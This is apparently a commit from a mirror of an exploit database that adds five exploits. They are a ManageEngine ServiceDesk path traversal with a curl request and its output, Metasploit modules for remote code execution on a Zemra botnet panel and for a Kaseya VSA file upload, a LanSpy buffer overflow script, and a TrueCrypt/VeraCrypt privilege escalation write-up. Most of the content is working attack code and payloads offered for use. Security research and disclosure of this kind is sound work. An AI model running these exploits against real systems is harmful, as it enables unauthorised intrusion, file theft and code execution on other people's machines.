bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-06

Browse source 
5 new exploits
This commit is contained in:
Offensive Security 2015-10-06 05:02:27 +00:00
parent 6774c7df3c
commit de10ad30b5
6 changed files with 495 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -34649,6 +34649,8 @@ id,file,description,date,author,platform,type,port
38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting Vulnerability",2013-03-04,"Julien Ahrens",java,webapps,0
38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting Vulnerability",2013-03-05,alejandr0.m0f0,php,webapps,0
38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0
38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,metasploit,multiple,remote,0
38401,platforms/windows/remote/38401.rb,"Kaseya VSA uploader.aspx Arbitrary File Upload",2015-10-05,metasploit,windows,remote,0
38362,platforms/windows/local/38362.py,"MakeSFX.exe 1.44 - Stack Buffer Overflow",2015-09-30,hyp3rlinx,windows,local,0
38363,platforms/php/webapps/38363.txt,"File Manager HTML Injection and Local File Include Vulnerabilities",2013-02-23,"Benjamin Kunz Mejri",php,webapps,0
38364,platforms/multiple/dos/38364.txt,"Varnish Cache Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,multiple,dos,0
@ -34681,3 +34683,6 @@ id,file,description,date,author,platform,type,port
38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service Vulnerability",2013-03-07,"Alyssa Milburn",linux,dos,0
38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery Vulnerability",2013-03-19,m3tamantra,php,webapps,0
38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0

Can't render this file because it is too large.

79
platforms/jsp/webapps/38395.txt Executable file
View file

@ -0,0 +1,79 @@
Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence <xistence[at]0x90.nl>
Product Description
-------------------
ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.
Vulnerability Details
---------------------
The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.
The following example will download the "win.ini" file:
$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
Solution
--------
Upgrade to ServiceDesk 9.1 build 9111.
Advisory Timeline
-----------------
07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure

88
platforms/multiple/remote/38402.rb Executable file
View file

@ -0,0 +1,88 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Zemra Botnet CnC Web Panel Remote Code Execution',
'Description' => %q{
This module exploits the CnC web panel of Zemra Botnet which contains a backdoor
inside its leaked source code. Zemra is a crimeware bot that can be used to
conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jay Turla <@shipcod3>', #Metasploit Module
'Angel Injection', #Initial Discovery (PoC from Inj3ct0r Team)
'Darren Martyn <@info_dox>' #Initial Discovery
],
'References' =>
[
['URL', 'http://0day.today/exploit/19259'],
['URL', 'http://insecurety.net/?p=144'], #leaked source code and backdoor intro
['URL', 'http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 10000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Targets' =>
[
['zemra panel / Unix', { 'Platform' => 'unix' } ],
['zemra panel / Windows', { 'Platform' => 'win' } ]
],
'DisclosureDate' => 'Jun 28 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI',[true, "The path of the backdoor inside Zemra Botnet CnC Web Panel", "/Zemra/Panel/Zemra/system/command.php"]),
],self.class)
end
def check
txt = Rex::Text.rand_text_alpha(8)
http_send_command(txt)
if res && res.body =~ /cmd/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s)
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => cmd
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
res
end
def exploit
http_send_command(payload.encoded)
end
end

55
platforms/win32/local/38403.txt Executable file
View file

@ -0,0 +1,55 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=538
Truecrypt 7 Derived Code/Windows: Drive Letter Symbolic Link Creation EoP
Platform: Windows
Class: Local Elevation of Privilege
Tested on: VeraCrypt 1.13 x86 on Windows 10
Summary:
The Windows driver used by projects derived from Truecrypt 7 (verified in Veracrypt and CipherShed) are vulnerable to a local elevation of privilege attack by abusing the drive letter symbolic link creation facilities to remap the main system drive. With the system drive remapped its trivial to get a new process running under the local system account.
Description:
Any user on the system can connect to the Truecrypt device object and mount a new encrypted volume. As part of this process the driver will try and create the requested drive letter by calling IoCreateSymbolicLink. To prevent redefining an existing drive letter a call is made to IsDriveLetterAvailable which attempts to open the link “\DosDevices\X:” for reading, returning FALSE if it was successfully opened. The specific code in src\Driver\Ntdriver.c is:
if (NT_SUCCESS (ZwOpenSymbolicLinkObject (&handle, GENERIC_READ, &objectAttributes)))
{
ZwClose (handle);
return FALSE;
}
return TRUE;
The bug which allows you to bypass this is due to the use of the NT_SUCCESS macro. This means that any error opening the symbolic link will cause the drive letter to be assumed to not exist. If we can cause the open to fail in any way then we can bypass this check and mount the volume over an existing drive letter. This is possible because with terminal services support the \DosDevices path points to a special fake path \?? which first maps to a per-user writable location (under \Sessions\0\DosDevices) before falling back to \GLOBAL??. When the kernel creates a new object under \?? is creates it in the per-user location instead so theres no conflict with a drive symbolic link in \GLOBAL??. So how to bypass the check? The simplest trick is to just create any other type of object with that name, such as an object directory. This will cause ZwOpenSymbolicLink to fail with STATUS_OBJECT_TYPE_MISMATCH passing the check.
This in itself would only cause problems for the current user if it wasnt for the fact that there exists a way of replacing the current processes device map directory using the NtSetInformationProcess system call. You can set any object directory to this which allows you DIRECTORY_TRAVERSE privilege, which is pretty much anything. In particular we can set the \GLOBAL?? directory itself. So to exploit this and remap the C: drive to the truecrypt volume we do the following:
1) Set the current processs device map to a new object directory. Create a new object called C: inside the device map directory.
2) Mount a volume (not using the mount manager) and request the C: drive mapping. The IsDriveLetterAvailable will return TRUE.
3) Wait for the driver to open the volume and at that point delete the fake C: object (if we dont do this then the creation will fail). While this looks like a race condition (which you can win pretty easily through brute force) you can use things like OPLOCKs to give 100% reliability.
4) The mount will complete writing a new C: symbolic link to the device map.
5) Set the \GLOBAL?? directory as the new process device map directory.
6) Unmount the volume, this calls IoDeleteSymbolicLink with \DosDevices\C: which actually ends up deleting \GLOBAL??\C:
7) Remount the volume as the C: drive again (youll obviously need to not use C: when referring to the volume location). The user now has complete control over the contents of C:.
Fixing the Issue:
While technically IsDriveLetterAvailable is at fault I dont believe fixing it would completely remove the issue. However changing IsDriveLetterAvailable to only return FALSE if STATUS_OBJECT_NAME_NOT_FOUND is returned from the ZwOpenSymbolicLink object would make it a lot harder to bypass the check. Also I dont know if specifying the use of the mount volume driver would affect this.
The correct fix would be to decide where the symbolic link is supposed to be written to and specify it explicitly. As in if you want to ensure it gets written to the current users drive mapping then specify the per-user directory at \Sessions\0\DosDevices\X-Y where X-Y is the authentication ID got from the SeQueryAuthenticationIdToken API. Or if its supposed to be in the global drive names then specify \GLOBAL??. Note this probably wont work on pre-fast user switching versions of XP or Windows 2000 (assuming youre still willing to support those platforms). Also Id recommend if going the per-user route then only use the primary token (using PsReferencePrimaryToken) to determine the authentication ID as that avoids any mistakes with impersonation tokens. Theres no reason to believe that this would cause compat issues as I wouldnt expect the normal user tool to use impersonation to map the drive for another user.
Note this wasnt reported in the iSec Partners security review so its not an missed fix.
Proof of Concept:
Ive provided a PoC, youll need to build it with VS2015. It will change an arbitrary global drive letter to a VeraCrypt volume. Note it only works on VeraCrypt but it might be possible to trivially change to work on any other truecrypt derived products. You MUST build an executable to match the OS bitness otherwise it will not work. To test the PoC use the following steps.
1. Create a veracrypt volume using the normal GUI, the PoC doesnt do this for you. Dont mount the volume.
2. Execute the PoC, passing the drive letter you want to replace, the path to the volume file and the password for the file. e.g. MountVeracryptVolume C: c:\path\to\volume.hc password.
3. If all worked as expected eventually the PoC should print Done. At this point the drive letter you specified has been replaced with the truecrypt volume. As long as you have a command prompt open you should be able to see that the C: drive is now pointing at the encrypted volume. You can hit enter to exit the program and unmount the volume, however if youve replaced the system drive such as C: this will likely cause the OS to become unusable pretty quickly.
Expected Result:
It shouldnt be possible to mount the volume over a global drive.
Observed Result:
The global drive specified has been replaced with a link to the encrypted volume.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38403.zip

136
platforms/windows/dos/38399.py Executable file
View file

@ -0,0 +1,136 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt
Vendor:
================================
www.lantricks.com
Product:
================================
LanSpy.exe
LanSpy is network security and port scanner, which allows getting different
information about computer:
Domain and NetBios names, MAC address, Server information, Domain and
Domain controller etc....
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
======================
LanSpy.exe uses an 'addresses.txt' plain text file which lives under the
main LanSpy
directory the file is used to load scanned IPs or URLs
e.g.
127.0.0.1
replace addresses.txt file with our malicious one, the buffer overflow
payload must
be the very first entry in the text file. Next, run LanSpy.exe and click
green arrow
or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we
will control
EIP at 684 bytes also overwrite both the NSEH & SEH exception handler
pointers...
Quick stack dump...
(1274.19c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx=00000000 esi=00000000
edi=00000000
eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
41414141 ?? ???
0:001> g
(1274.19c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7714b4ad esi=00000000
edi=00000000
eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
52525252 ?? ???
0:001> !exchain
0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
0264fe8c: 52525252
Invalid exception stack at 42424242
POC code(s):
=============
'''
import os
#LanSpy.exe buffer overflow POC
#by hyp3rlinx
#hyp3rlinx.altervista.org
#=============================
#LanSpy.exe uses an 'addresses.txt' text file
#which lives under the LanSpy directory
#the addresses.txt file is used to load scanned IPs or URLs
#control EIP at 684 bytes... also overwrite
#both the NSEH & SEH exception handler pointers
#-----------------------------------------------
payload="A"*684+"BBBB"+"RRRR" #<------- KABOOOOOOOOOOOOOOOOOOM!
file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w")
file.write(payload)
file.close()
'''
Public Disclosure:
===================
October 5, 2015
Exploitation Technique:
=======================
Local
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''

132
platforms/windows/remote/38401.rb Executable file
View file

@ -0,0 +1,132 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions
between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary
directory leading to arbitrary code execution with IUSR privileges. This module has been
tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6922'],
['ZDI', '15-449'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],
['URL', 'http://seclists.org/bugtraq/2015/Sep/132']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Targets' =>
[
[ 'Kaseya VSA v7 to v9.1', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 23 2015'))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('ConfigTab','uploader.aspx')
})
if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end
def upload_file(payload, path, filename, session_id)
print_status("#{peer} - Uploading payload to #{path}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
'vars_get' => {
'PathData' => path,
'qqfile' => filename
},
'data' => payload,
'ctype' => 'application/octet-stream',
'cookie' => 'sessionId=' + session_id
})
if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"')
return true
else
return false
end
end
def exploit
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('ConfigTab','uploader.aspx')
})
if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
session_id = $1
else
fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session")
end
asp_name = "#{rand_text_alpha_lower(8)}.asp"
exe = generate_payload_exe
payload = Msf::Util::EXE.to_exe_asp(exe).to_s
paths = [
# We have to guess the path, so just try the most common directories
'C:\\Kaseya\\WebPages\\',
'C:\\Program Files\\Kaseya\\WebPages\\',
'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
'D:\\Kaseya\\WebPages\\',
'D:\\Program Files\\Kaseya\\WebPages\\',
'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
'E:\\Kaseya\\WebPages\\',
'E:\\Program Files\\Kaseya\\WebPages\\',
'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
]
paths.each do |path|
if upload_file(payload, path, asp_name, session_id)
register_files_for_cleanup(path + asp_name)
print_status("#{peer} - Executing payload #{asp_name}")
send_request_cgi({
'uri' => normalize_uri(asp_name),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
end